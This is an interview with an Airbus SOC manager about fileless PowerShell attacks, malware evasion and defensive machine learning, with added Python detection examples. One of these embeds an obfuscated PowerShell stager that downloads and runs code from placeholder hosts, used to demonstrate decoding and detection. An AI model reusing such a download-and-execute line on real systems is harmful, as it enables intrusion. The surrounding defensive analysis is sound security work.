When it comes to protecting physical assets from cyber-attacks, the defence sector faces some of the most sophisticated cyber-threats there are. SC Media UK spoke to Lloyd Rush, UK Cyber Defence Centre manager at Airbus Defence and Space, who runs the two UK SOCs, to get a better idea of some of the threats faced, such as the growth in fileless attacks and the use of AI by attackers, and of how SOCs are fighting back.
Airbus CyberSecurity secures many of the world's most secretive establishments including governments, military forces and critical national infrastructure organisations. That includes 90 percent of the UK's Ministry of Defence networks. It does so via its cyber-defence centres in France, Germany, Spain, the US, and two in the UK - Cyber Defence Centre in Newport and its military site, the Global Operations Security Coordination Centre at MOD Corsham - all working together. The company employs some 700 cyber-specialists and achieves a turnover of more than €100 million.
Work undertaken includes government-grade crypto, used in re-keying aircraft for the military, and crypto and field guns for Typhoon fighter jets - with Rush mentioning that recent successes include taking the time to re-key a Typhoon down from 10 minutes to 90 seconds, leaving weapons and refuelling as the longest part of the process.
Rush explained to SC Media UK: “The strategy of the organisation is to pivot toward enterprise cyber-security, primarily through its SOCs in Abu Dhabi (its Middle East HQ), its Paris HQ, and UK SOC in Newport, working together to protect European customers in ‘safety critical' industry segments.” It is not so much banks or retail as airports, utility companies, power generation companies, military and government: establishments where there is a security and safety element to their cyber-footprint, and often an industrial control system (ICS) element as well. Newport also has a research lab devoted solely to cyber-security, examining crypto as a way to potentially secure ICS systems and how to carry out maturity checks for organisations.
It has recently partnered with SITA (an air transport services company owned by airlines, airports and others, including Airbus) to provide a dedicated aviation SOC, believed to be the first of its kind, targeted at aviation customers and primarily covering airports worldwide.
Looking at future developments, at Defcon this year Airbus demonstrated an OpenAI framework (a machine-learning cloud environment) that uses machine learning to customise malware and make it undetectable, and reported that 16 percent of the samples submitted evaded even next-generation AV and sandboxing technologies.
Rush continues: “Going forward the tools and technologies that we are using to counter this threat would still stand up. When we look at machine learning applied to those practices, these are the algorithms that machines go and look for and with every new sample that we can detect, we can put that into our tooling and better learn what's being used to attack us. And that has a cost to the attacker and has no increase to our overhead in the SOC which continues to improve our tooling, and we are also putting good executables within there as well so improving our understanding of the footprint, and the ever changing applications out there as well. And through that you can work out the Malware classification (using Self Organising Feature Maps (SOM) and Machine Activity Data). So we are asking the question, is it malign, isn't it malign, and if we can get that answer very accurately we are in a good place.”
SOM is the productisation of proof-of-concept work created at the Airbus centre of excellence in cyber-security analytics at the University of Cardiff, in association with the Airbus Digital Transformation office in the Newport building. It provides malware classification using self-organising feature maps and machine activity data. It takes an executable and watches what it does over a period of time - processes, memory, swap use, packets received, packets sent - compares that activity with what it knows to be good and what it knows to be bad, and arranges what it finds into a 2-D map of 50 pixels by 50 pixels. If a sample lands on a hot spot among the known bads it is given a score, from clearly bad to marginal. The system can sit and look at malware binaries, and in initial testing it is reported to have a 95 percent success rate in positively identifying malware from this mapping.
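To make the mapping concrete, here is an added illustration in Python of the classification step described above. It is not the Cardiff or Airbus code: a small Kohonen self-organising map is trained on constructed machine-activity vectors, each map node is labelled by the known-good and known-bad training samples that land on it, and an unseen sample is scored by the known-bad share of the nearest labelled hot spot. The feature names, value ranges, sample profiles and the 8x8 grid (the article describes 50 by 50) are all assumptions made for the example.

```python
"""Toy self-organising map (SOM) over machine-activity features.
Added illustration, not the Airbus/Cardiff implementation: feature names,
scaling ranges, the 8x8 grid and every sample below are constructed."""
import math
import random

FEATURES = ["processes", "memory_mb", "swap_mb", "pkts_recv", "pkts_sent"]
BOUNDS = [(0, 200), (0, 4096), (0, 2048), (0, 5000), (0, 5000)]  # assumed per-feature ranges
GRID = 8            # the article's map is 50x50; 8x8 keeps pure Python fast
RNG = random.Random(7)  # fixed seed so the example is reproducible


def normalise(raw):
    """Scale each feature into [0, 1] using the fixed per-feature bounds."""
    return [[min(1.0, max(0.0, (v - lo) / (hi - lo))) for v, (lo, hi) in zip(s, BOUNDS)]
            for s in raw]


class SOM:
    def __init__(self, grid, dim, rng):
        self.grid, self.rng = grid, rng
        self.w = [[[rng.random() for _ in range(dim)] for _ in range(grid)] for _ in range(grid)]
        self.votes = {}  # (i, j) -> [known_good_hits, known_bad_hits]

    def bmu(self, x):
        """Best-matching unit: the node whose weight vector is closest to x."""
        best, where = float("inf"), (0, 0)
        for i in range(self.grid):
            for j in range(self.grid):
                d = sum((a - b) ** 2 for a, b in zip(x, self.w[i][j]))
                if d < best:
                    best, where = d, (i, j)
        return where

    def train(self, xs, epochs=30, lr0=0.5):
        """Classic Kohonen update: pull the BMU and its neighbourhood towards each
        sample, with learning rate and neighbourhood radius shrinking over epochs."""
        sigma0 = self.grid / 2
        for e in range(epochs):
            frac = 1 - e / epochs
            lr, sigma = lr0 * frac, max(0.5, sigma0 * frac)
            order = list(xs)
            self.rng.shuffle(order)  # avoid presenting all of one class in a row
            for x in order:
                bi, bj = self.bmu(x)
                for i in range(self.grid):
                    for j in range(self.grid):
                        h = math.exp(-((i - bi) ** 2 + (j - bj) ** 2) / (2 * sigma * sigma))
                        self.w[i][j] = [w + lr * h * (v - w) for v, w in zip(x, self.w[i][j])]

    def label(self, xs, ys):
        """Record where each known-good (0) / known-bad (1) training sample lands."""
        for x, y in zip(xs, ys):
            self.votes.setdefault(self.bmu(x), [0, 0])[y] += 1

    def score(self, x):
        """Share of known-bad among labelled nodes around x's BMU (0 = clearly good,
        1 = clearly bad).  The radius grows until a labelled node is found, so a
        sample landing on an unlabelled node still gets a score."""
        bi, bj = self.bmu(x)
        for r in range(self.grid):
            good = bad = 0
            for (i, j), (g, b) in self.votes.items():
                if max(abs(i - bi), abs(j - bj)) <= r:
                    good, bad = good + g, bad + b
            if good + bad:
                return bad / (good + bad)
        return 0.5


def verdict(score):
    """Map the hot-spot score onto a clearly-bad / marginal / good scale."""
    return "bad" if score >= 0.8 else "marginal" if score > 0.2 else "good"


def synth(centre, n, spread):
    """Constructed activity profiles: jitter each feature by +/- spread of its range."""
    return [[c + RNG.uniform(-spread, spread) * (hi - lo) for c, (lo, hi) in zip(centre, BOUNDS)]
            for _ in range(n)]


BENIGN_PROFILE = [40, 800, 100, 1500, 600]     # assumed: modest CPU, inbound-heavy traffic
MALIGN_PROFILE = [150, 3000, 1200, 1000, 4500]  # assumed: spawning, memory/swap spikes, outbound-heavy


def build_classifier():
    raw = synth(BENIGN_PROFILE, 40, 0.05) + synth(MALIGN_PROFILE, 40, 0.05)
    ys = [0] * 40 + [1] * 40
    xs = normalise(raw)
    som = SOM(GRID, len(FEATURES), RNG)
    som.train(xs)
    som.label(xs, ys)
    return som


def classify(som, raw_sample):
    """Return (verdict, score) for one unseen activity vector."""
    s = som.score(normalise([raw_sample])[0])
    return verdict(s), s


if __name__ == "__main__":
    som = build_classifier()
    for sample in ([45, 850, 120, 1400, 650], [140, 2900, 1100, 1100, 4300]):
        print(dict(zip(FEATURES, sample)), "->", classify(som, sample))
```

The point of the neighbourhood search in `score` is the "marginal" band Rush mentions: a sample whose BMU sits between a good and a bad region picks up votes from both and lands in amber rather than being forced to red or green.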
Within the SOC Airbus is looking at automation and machine learning, as Rush explains: “At level one we want to automate as much as possible to free up skills; SOC analysts are not cheap, and this enables them to be involved in the threat hunt to spot the unknowns, or in setting the criteria and being able to detect when it steps outside of that. It's about clarity of view, and by looking at the end points and user behaviour analysis, that becomes the cornerstone for both our processes and the technology, and that's the piece we're moving forward with.”
SC asked whether, even with these innovations, an attacker who knows what you have defined as good will simply use machine learning to appear, as far as possible, in the ‘known good' category.
Rush responded: “That's looking at timing, so not around delivery, it's on execution. At some point it [the malware] has to reveal its cards and execute, and it's those actions that make it very difficult to hide - when you feed in lots of known good - by definition it's going to step outside of that. So long as you put enough samples in there it will be detected. If you deliver the malware and it only ever does good, it's not really malware.”
Rush went on to say that it is not necessarily about exfiltration of data; it could be anything. The system is not really interested in protocols or what is in the packets, but in the burst of action. If the malware sleeps for a while and then starts, it will give out indicators. The tools are doing the classification [of its actions], so if you put enough samples in there it will learn those new bad habits - and what was once green becomes amber, somewhere between red and green.
What about attackers disrupting your own information flow with false readings, like Stuxnet? Rush agreed: “There is a trend of the dropping of red herrings; it has been observed where the injection into memory is well hidden, as is the spraying of some of the commands, or sending those commands into the registry. But we have also seen where the adversary is dropping a tool or a technique of another group, another style; particularly we have seen the financial cyber-criminal mimic some of the tools and techniques of some of the nation states, and actually made it very overt when doing so. For the uncontrolled (untrained) eye you can jump in and say, yeah, I've got the solution. If you stop focussing in on trying to get exactly this type and step back and look at it in a more generic approach, you are saying what constitutes bad, what's normal, which machines should be talking to which machines. All of a sudden we are seeing PowerShell running at six in the morning, when the adversary makes a mistake; we are all human, we all make mistakes. And it's those little trigger points that are key.”
And what about the idea of true artificial intelligence, including ‘sentient malware'? What's in it for defenders and our adversaries?
Rush agreed that a lot of AI is hypothetical and sits with the academics. “For the moment we are reactive - and reactive to what we see, and we are also trying to predict. As with AI, I have not seen any evidence yet within the SOCs of that coming forward. As we better understand it we'll come up with the strategies [to fight it].
“There is extremely clever machine learning. But that [true AI] is going to be quite a gear change, and cloud computing becomes an enabler. It is very hypothetical at the moment.
[We do have] machine learning using big data. In the SOC we get accused of wanting more of everything, more data, more logs, but the more logs and data sources you have, the more accurately you can predict and reduce false positives as well, which is important. It comes down to the basics as well. It doesn't have to be really smart and really clever around automation and some of those algorithms and some of those bits and pieces we put in there. We have different levels of analysts - one, two and three, with the third-line analysts engaged in that threat hunt, and we need someone to do that continuous monitoring, looking at all those data sets, and it's putting that learning into the tooling so when customer alerts and user alerts come to screen it has playbooks telling them what metadata to go and check, what to attach to the incident, so we are increasing our speed of response to the customer, as time is extremely critical. And we need to make sure all the right information is gathered at the time and it escalates. At the second line we start making severity categorisation, and then escalate that to an incident.”
SC also asked, so how do you introduce innovative new technology based on learning with no initial track record of known good?
Rush replied: “There's always an element of fine-tuning and understanding to be built up. While they're implementing [new tech] you've got that added complication, they're generally being administered through their installation, so there's that settle-down period when you've actually got the real end user. And then understanding that normalisation. Every piece of new technology presents new challenges. It's something we are very used to.
“Also, the diversity of the attack footprint is greatly expanding with every new piece of technology.
“We protect this niche of companies that have a similar way of doing things. Production, manufacturing, more connected devices than banking systems. So those analysts are specialised around those industries.
“Looking through our clients, it's also doing the threat intelligence - which isn't intelligence if it isn't actionable - which may be a cliche but it's so true. It's how you take that threat intel and make it actionable. The use cases are exactly that. If you bring that down to the business context there's no point me coming to you about a threat on Cisco if you don't use Cisco; you're not interested in that. It's building what the threats are and the attack footprint: who the adversaries are, what their objectives are and how they are going to achieve that. If we can map that back it becomes a chain, and if that chain can lead back to the attacker and his objective, and if we can break that link at any place, it can trombone back to the attacker, as they are coming from multiple vectors as that attack surface has expanded.
“At this end there may be many thousands of links, but as we get closer there may be only one or two links, and if we can mitigate or break those links and put strong protection measures around there, it's this continual re-evaluation of cyber-risk within a business. It's working out how you best balance those mitigations.”
SC asked: you work in this world of industrial controls, but they are notorious for using old equipment and systems that were once isolated and are now connected, and vulnerable to adversaries using top-end attacks - how do you reconcile that?
Rush replied: “The good news is old tech is not running PowerShell. It becomes very specialist, with different systems used, including proprietary ones. In best practice they are all put into different security zones. Ultimately in an enterprise network, at the top end, there should not be those connections. We give ‘best advice' to clients, but whether they choose to take that advice is up to them. We also use defensive monitoring which can assess that threat, so clients understand that attack footprint.
“Unlike enterprises - which are quite mature and everyone knows what's there - ICS customers often need to map out what estate they currently have as the first step. Many of our customers go through that because they don't even know what their vulnerabilities are, what's connected to the internet and what's not connected, how many devices they have in, say, an oilfield in the Middle East. For us the first step is figuring out a smart way to map those devices before we say ‘how do we protect them.'”
SC also asked, for your ICS customers, how real is the threat of Ransomware of things?
Rush replied: “It's one of those hypothetical things, there's been reports, it makes sense - there's certainly a path there and it's absolutely viable. Our defensive measures that sit out there and good husbandry will help. There's also DDoS ransoms - if someone puts value in that data and you can disrupt that, then there's big business while there is money to be made. And the criminals will always be looking for the next thing. As with WannaCry, NotPetya, and the collateral mess behind that.
“We have our own protective arm and system to protect Airbus industrial controls. It starts with [defence against] nation states, but as with all things it moves on to financial gain. That's why we put so much emphasis there [in cyber-protection for ICS], though it's a nascent market with not a huge demand yet.”
In response to the question, will GDPR affect the market, eg, will you have to report a breach which isn't a data breach? Rush replied, “We'll soon see a lawyer in the SOC” to decide what is and is not reportable.
“It's up to companies how they do that - we would advise responsible disclosure. We can learn from the past every time, and with that we can predict. We would take that incident and pass that on to the client [for them to decide what they do with it].”
It's one thing for companies to defend themselves, but SC asked: are critical infrastructure attacks acts of war where the government should lead the defence?
Rush replied: “Government will speak for themselves but there is already significant government expenditure on cyber-defence to lead the way, and we are on a number of bodies working with UK government. Things like CPNI and nuclear - it is something they are taking seriously, and we work with them on that.
“There is this secondary issue for warfare. For every 100 nautical miles your carrier goes into a certain region you get rolling blackouts and I think we may see that sort of scenario in the future.”
SC noted that there have been allegations that it was GPS spoofing that caused US warship crashes earlier this year, and asked whether this shows transport is potentially on the front line.
Rush responded: “That applies to businesses at all levels, right from the SMEs. If you look at the SMEs, typically they need to turn to automation to deliver things within budget, and it's a difficult balance to strike with their cyber-risk. Again, the UK government, through NCSC etc, is cascading down to business, and I think that that's a great thing and that should be encouraged and shouted from the treetops. If all businesses understand that threat, and what they can afford, and understand those best practices, then we are all in a better state. And also reporting at that level, getting everybody contributing to these indicators of compromise, and also understanding and learning from breach history, will definitely help us see what's coming over the hill. Particularly around some of the hypothetical stuff coming in the future.”
SC mentioned we knew of global players who had failed to upgrade all XP installations due to cost - and asked, what could be done? Rush said: “If you look at a global enterprise that's a problem - the OS vendor has made a decision not to support a product that's widespread - and replacing infrastructure does take time, especially in businesses that are extremely critical - where downtime is expensive. It's about understanding that risk and re-evaluating that risk and working with the vendors.”
It was also noted that, unlike IT, where you can announce that a system will be down from 3am to 6am, in a lot of OT environments you cannot necessarily switch systems off to do an upgrade, a check, a vulnerability analysis or pen testing. This is where businesses need to look holistically at how they trade off security against operational and financial considerations.
Discussion turned to threat trends. Rush told SC that to understand the trends in the attacks Airbus is seeing, it is first necessary to look at traditional evasion techniques and malware, and at how cyber-attacks are becoming increasingly sophisticated on all rungs of the ladder, so that a blurring of traditional nation-state attacks with those from financially motivated cyber-criminals has increasingly been seen, particularly since 2014, more so in 2016, and through into 2017.
Rush also commented: “It does include nation states subcontracting to criminal groups, but also some schools of thought are saying that the traditional nation-state sponsored actors are now investing some of their time in some of the financial stuff,” though he says that Airbus doesn't tend to look at final attribution.
In relation to changes in the type of threat faced, Rush comments, “If we look at some of the traditional malware execution, we have a piece of malware that will run on the hard drive, it will execute just like any other programme, and traditionally antivirus was the first line of defence. But we, collectively as a cyber-security community, questioned whether anti-virus was enough, and we're clear what the outcome is.
“If we look at the assembly - this is brbbot.exe, we've got elements in the memory, it's readable, its static, and through that the antivirus engines can work out that there are indicators in there that there is some malign behaviour.
“If we present that executable to an online website that I run that across a number of AV vendors, McAfee detected this as a generic download (not calling out McAfee in particular), Kaspersky picks it up as a trojan, Norton picks it up as a Trojan, and there is generally a good success there. That's a really bad outcome for the adversary, so the adversary went and started encrypting and packing malware, mutating it in such a way that it becomes more difficult for the AV to pick up.”
It was explained that even in this encrypted form, if it is static it is detectable - even in long, complicated strings of DNA there are elements that are identifiable, and it is these that give us the generic-download or generic-trojan detections, which is again a bad outcome for the attacker. The attackers went from there to polymorphic malware, which is re-encrypted with a different key each time it starts up, but which, once decrypted, has the same behaviours and the same payloads.
Rush adds, “15 years ago polymorphic was the thing that scared us the most. Whereas now we are reasonably comfortable with polymorphic (attacks). But actually [the issue is], being able to mutate - and in malware as a service, it isn't difficult to do, you don't have to be technical, you just have to know where to look, where to download, and press the right buttons. For as little as US$300 (£225) you can have an exploit kit to run statically at home, installing it on a website, but using that tooling it's quite simple to further mutate that malware. So we've taken that brbbot and applied some basic encryption to that assembly and you can see [shows slide] the code looks very, very different. And anti-virus engines will look at it and handle it differently depending whether it's traditional antivirus or next gen AV.”
Easy-to-use UIs include graphics and dashboards for non-technical users. Popular kits include:
Phoenix Exploit Pack
Rush adds, “We present that executable into the same online tool and we can see that the encrypted version has not been detected by some of the basic engines - more than one did not detect it. Among those that did, Kaspersky for example, we compare with those that didn't and that's the difference between standard and next gen and typically Kaspersky is using sandbox technology in there so they are allowing the file to run and looking at what falls out the other end. It's gone through all its de-encryption, its run, yes its malware - it's a generic trojan, whereas McAfee has done that quickly and it's about trying to detect at speed and it hasn't picked that up. So that becomes a bad outcome for the defenders.
“We need to find the next step. And that's whitelisting. Whitelisting is extremely effective if we understand its limitations. With whitelisting you take the executables that you want to run on the system and you basically put them in a locker, and they are the only executables that will run on the system so if one of these mutated executables drops onto your drive then it will say ‘no you can't run' even though the anti-virus hasn't detected it, as such it just puts it away and quarantines it off. So the adversary then looks at ‘how can I execute our code with this whitelisting in place?'
“And the way the adversary can do that is through thread injection. The way they do that is that to inject the payload or code; it will use existing applications that are allowed to run - popularly referred to as ‘feeding off the land' using the common commands that are used, through tooling. Typically PowerShell, which is the modern version of your command lines. It allows you to interface with the operating system to clear the administrators' power users, to administer your basic admin functions. It becomes very difficult when running in memory - what we call ‘fileless' attacks. It is also ‘non-malware' because there is no file, but it's installing, using PowerShell to inject directly into memory.
“As elsewhere, delivery is usually via spear-phishing with embedded scripts in Word documents or a browser vulnerability in JavaScript, Office macros, VBScript, Flash, fired by clicking a link, be that by mass phishing, something like Dridex or something more recent. Where attackers are getting good returns is some of the financial attacks.
“It's worth putting in a little more investment, in looking into your target and putting something out there that's a bit more relevant, putting a bit more bait on the hook. Essentially some of this malware as a service, or exploit kits will be running on these websites and will look for vulnerabilities and run that into memory,” says Rush, continuing: “These fileless attacks have a reduced forensic footprint - they're running in real time, don't touch the hard drive.
“It was a surprise in the community that the attackers took this approach because there's a massive trade-off in persistence. If you turn your laptop, PDA or whatever endpoint device off, as soon as that memory has gone the file's gone, and that obviously caused an issue. More recently we've seen persistence being maintained by not just injecting the payload into the running memory, but actually putting elements of the code and spraying that into the registry using something which is like PowerShell, like PowerShell's little brother. It's just as powerful but it's not as well understood by many communities, but it's well understood by the adversaries. It's hiding that payload now in the registries, which has been much harder to find. Command and control can be achieved via misuse of common protocols such as DNS - specifically the DNS TXT field - unformatted text responses in DNS lookups.”
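Rush's last point, command and control over DNS TXT records, is the kind of thing a SOC can hunt for in resolver logs. The following is an added example, not Airbus tooling: it runs over constructed resolver records, treats a TXT answer as suspicious when it is long, high-entropy and not a recognised SPF/DMARC/DKIM-style record, and alerts when one client keeps querying fresh, never-repeated labels under a single domain and every answer looks like payload. The log shape, client names, the reserved .example domains, the tasking blob and the thresholds are all assumptions made for the example.

```python
"""Hunting DNS TXT command-and-control in resolver logs.
Added example, not Airbus SOC tooling: log shape, hosts, domains,
the tasking blob and the thresholds are constructed."""
import base64
import math
import random
from collections import defaultdict

_rng = random.Random(3)  # fixed seed so the constructed log is reproducible
# Constructed 'tasking' such as a beacon would pull down inside a TXT answer.
TASKING = base64.b64encode(bytes(_rng.getrandbits(8) for _ in range(90))).decode()


def beacon_name():
    """Constructed beacon query: a random-looking first label under the C2 domain."""
    return "%08x.cdn-metrics.example" % _rng.getrandbits(32)


DNS_LOG = [  # (client, qname, qtype, rdata) - constructed resolver records
    ("ws01", "www.vendor.example", "A", "192.0.2.10"),
    ("ws01", "_dmarc.vendor.example", "TXT", "v=DMARC1; p=reject; rua=mailto:dmarc@vendor.example"),
    ("ws02", "vendor.example", "TXT", "v=spf1 include:_spf.mail.example -all"),
] + [("ws01", beacon_name(), "TXT", TASKING) for _ in range(6)]

# TXT records that legitimately exist on most domains; assumed allow-list of prefixes.
LEGIT_TXT_PREFIXES = ("v=spf1", "v=dmarc1", "v=dkim1", "google-site-verification=", "ms=")


def entropy(s):
    """Shannon entropy in bits per character."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def base_domain(qname):
    """Registrable part, assumed to be the last two labels (no public-suffix list here)."""
    return ".".join(qname.split(".")[-2:])


def suspicious_txt(rdata, min_len=64, min_entropy=4.5):
    """Long, high-entropy TXT data that is not a known record type looks like payload."""
    return (not rdata.lower().startswith(LEGIT_TXT_PREFIXES)
            and len(rdata) >= min_len
            and entropy(rdata) >= min_entropy)


def find_txt_c2(log, min_beacons=5):
    """Group TXT lookups per (client, base domain); alert where every answer looks
    like payload and the first labels never repeat (each query is a fresh beacon)."""
    groups = defaultdict(lambda: {"labels": set(), "suspicious": 0, "total": 0})
    for client, qname, qtype, rdata in log:
        if qtype != "TXT":
            continue
        g = groups[(client, base_domain(qname))]
        g["total"] += 1
        g["labels"].add(qname.split(".")[0])
        g["suspicious"] += suspicious_txt(rdata)
    return [
        {"client": c, "domain": d, "beacons": g["total"]}
        for (c, d), g in groups.items()
        if g["suspicious"] == g["total"] and len(g["labels"]) >= min_beacons
    ]


if __name__ == "__main__":
    for alert in find_txt_c2(DNS_LOG):
        print("possible TXT C2:", alert)
```

The allow-list matters as much as the entropy test: SPF and DMARC answers are long and character-rich enough to trip a naive threshold, which is exactly the false-positive cost Rush says more log sources are meant to drive down.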
So is that game over? “Absolutely not - we are looking at mitigations around these fileless and Powershell attacks and right at the top is around good user cyber-threat awareness. That has to come right the way through the business no matter what size the business is, ensuring you've got that buy-in, at all levels from the exec office down to the engineers that are installing and putting in updates to those that are looking at their social media during lunch break and exposing their footprint further.
“A couple of other things are the ‘patch early, patch often' and that will avoid nearly 85 percent of attacks. If I were to bet on the best solution to this I would say behaviour analytics and its because:
“It's the user behaviour; it's the endpoint behaviour, it's the network behaviour. If we can organise and understand each of these, the daily and monthly routines, and something steps outside that usual behaviour, it can become really obvious. What we can do is identify these indicators of compromise and put that into our tooling and get that into the mindset of the SOC analysts and engineers.”
Mitigating Fileless Attacks:
Good user cyber threat awareness
Patch often, Patch early
Disable macros in document attachments received via email
Least privilege for users
Block websites hosting exploit kits
Email content inspection
Enhanced endpoint protection including registry and memory protection
“Then what we can start doing is actual hunting for suspicious transactions through these indicators of compromise, and it's these behavioural changes and the transaction training that we start to look for within the tooling, which step outside of usual behaviour for that user, the endpoint and the network.
“As an example here is typical tool we are using within the SOC, commercial off the shelf Splunk, but there is a rule here that we have set up, looking at lots and lots of different log sources.
“There's a huge data lake that we collect for each of the clients, and within there we have a set number of use-cases that we can customise. These are things we are coming up with to mitigate things like the fileless and PowerShell attacks. Typically they are looking at suspicious Office activity. Looking at Word and Excel, eg Excel starting off a VPN, starting off PuTTY, a communication tool, which generally you wouldn't want to see.
“Looking at a real life example from last week (early September), using those same rules, one of the analysts was alerted to a suspicious chain, and on further investigation we found that we also had a host attack on some of the commercial tooling - in this case FireEye. From dynamic analysis within the web, it was delivered in mail, but it was sufficiently sophisticated that the mail system hadn't initially picked it up. It was the secondary communication in the web that had when we looked at how it had achieved this. And this is typical of what we are seeing. We used to associate this typically more with the advanced nation state, or the high end financial attacker or threat actor.
“The Word document had embedded code, base64 encoded, and one of the lovely things about PowerShell is it natively decodes base64, so there is a bit of an indicator there that things aren't quite right, but we can also see that our Word document is spawning powershell.exe, a whitelisted programme, so it's going to be able to run. When we decoded the initial call it was still quite difficult to read, using a number of different obfuscation methods, using a set of arrays and splits, and it's trying to hide things so it's using escapes that the programming language just won't read.
“If we remove all of that and put it in what PowerShell will actually run, it becomes more ‘human readable' and we can see what the objectives were and what it's trying to do. Essentially the PowerShell runs some randomisation and within there it goes out and contacts five websites, and attempts to call down an executable that it's going to spray into memory. At this point we have got to block, so we've broken the communication. We've taken a look at those domains, and this is a good way to look at how effective this method is within the Airbus SOC, in that we look at the reputation of those domains, eg most people are aware of the likes of Spamhaus and so on, but we only have one read against all of those, so we are ahead of the game.
“Generally these will be reported on, taken down and they'll be altered. Obviously best practice is to pass details on and we have passed on these details through the SIFF chain etc, alerting other communities that this bad is out there and is being served on these sites. If this was on a client[site] the important piece for us would be the incident response at the client, and what's happened out there and so right at this point, the final attribution and what it does, the real truth rather than what may have happened.”
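The chain Rush describes - Word spawning a whitelisted powershell.exe with a base64 -EncodedCommand, obfuscated with string splits and escapes - can be expressed as detection logic. The following added example is not the Airbus SOC's Splunk use-case or tooling; it is Python run over constructed Sysmon-style process-creation events. It flags Office applications spawning script hosts, decodes the UTF-16LE base64 that -EncodedCommand carries, undoes the string concatenation and backtick escapes, and pulls out the download URLs that are invisible in the raw command line. The event fields, hostnames, stager text and reserved .example domains are all constructed for the example.

```python
"""Office -> PowerShell 'fileless' chain detection over constructed process
events.  Added example, not the Airbus SOC's use-case or tooling: event fields,
hosts, the stager and the .example domains are constructed."""
import base64
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "putty.exe"}

# Constructed stager in the style the article describes: string splitting and a
# backtick escape hide the URLs and the class name from naive pattern matching.
STAGER = (
    "$u=('http://'+'a.example'+'/x')+','+('http://'+'b.example'+'/y');"
    "$d=New-Object Net.WebC`lient;"
    "foreach($s in $u.Split(',')){try{IEX $d.DownloadString($s);break}catch{}}"
)
# powershell.exe -EncodedCommand expects base64 of UTF-16LE text, so build it that way.
ENCODED = base64.b64encode(STAGER.encode("utf-16le")).decode()

EVENTS = [  # constructed Sysmon-style process-creation records
    {"host": "ws01", "parent": "explorer.exe", "image": "outlook.exe", "cmdline": "outlook.exe"},
    {"host": "ws01", "parent": "outlook.exe", "image": "winword.exe",
     "cmdline": '"winword.exe" /n invoice.docm'},
    {"host": "ws01", "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc " + ENCODED},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File backup.ps1"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; -e, -ec, -en, -enc are common.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
URL = re.compile(r"https?://[\w.-]+(?:/[^\s'\",;)]*)?")
INDICATORS = ("IEX", "Invoke-Expression", "DownloadString", "DownloadFile", "WebClient")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def deobfuscate(script):
    """Undo two cheap tricks: a backtick in front of an ordinary character (a no-op
    in PowerShell) and 'a'+'b' literal concatenation, repeated to a fixed point."""
    s = re.sub(r"`(?=[^0abefnrtuv])", "", script)
    concat = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
    # parentheses around a lone literal, but not a call such as Split(',')
    paren = re.compile(r"(?<![\w.])\(\s*('[^']*')\s*\)")
    while True:
        new = paren.sub(r"\1", concat.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s))
        if new == s:
            return s
        s = new


def analyse(events):
    """Flag Office applications spawning script hosts and unpack what they were told to run."""
    alerts = []
    for ev in events:
        if ev["parent"].lower() not in OFFICE_PARENTS or ev["image"].lower() not in SCRIPT_HOSTS:
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        script = deobfuscate(decoded) if decoded else ev["cmdline"]
        alerts.append({
            "host": ev["host"],
            "chain": f"{ev['parent']} -> {ev['image']}",
            "encoded": decoded is not None,
            "script": script,
            "urls": URL.findall(script),
            "indicators": [k for k in INDICATORS if k in script],
        })
    return alerts


if __name__ == "__main__":
    for a in analyse(EVENTS):
        print(a["host"], a["chain"], "encoded" if a["encoded"] else "plain", a["urls"], a["indicators"])
```

Note that the powershell.exe launched from explorer.exe on ws02 is not flagged: as Rush says, the signal is the chain and its context, not PowerShell running at all. Running `URL.findall` on the raw STAGER finds nothing, which is why the decode and de-obfuscation steps precede the reputation lookup.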
Rush concluded on a positive note, pointing out that ICS is not just hanging there on the internet undefended. Generally best practice is quite good, but of course those are not the ones that make the news. It's the mistakes, the ones that haven't quite got there, that we hear about - but that is not the norm.